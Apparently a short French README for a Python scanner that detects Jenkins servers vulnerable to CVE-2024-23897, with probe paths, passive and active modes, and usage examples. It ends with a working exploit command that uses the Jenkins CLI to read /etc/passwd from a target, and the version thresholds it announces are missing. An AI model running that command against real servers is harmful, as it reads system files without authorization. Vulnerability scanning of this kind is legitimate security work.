
Trouve l'environnement Jenkins et vérifie la présence de CVE-2024-23897
Trouve l'environnement Jenkins et vérifie CVE-2024-23897
Teste les chemins : /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json
Identifie via :
Passif (par défaut) : compare la version détectée avec les seuils :
Actif (--active) : envoie le handshake du protocole binaire du Jenkins CLI via HTTP. Si le serveur répond 200 + Content-Type: application/octet-stream, confirme que le canal CLI est ouvert et que l'exploit est applicable.
python jenkins_scan.py -f urls.txt
python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt
python jenkins_scan.py -f urls.txt -t 20 -v --no-color
java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"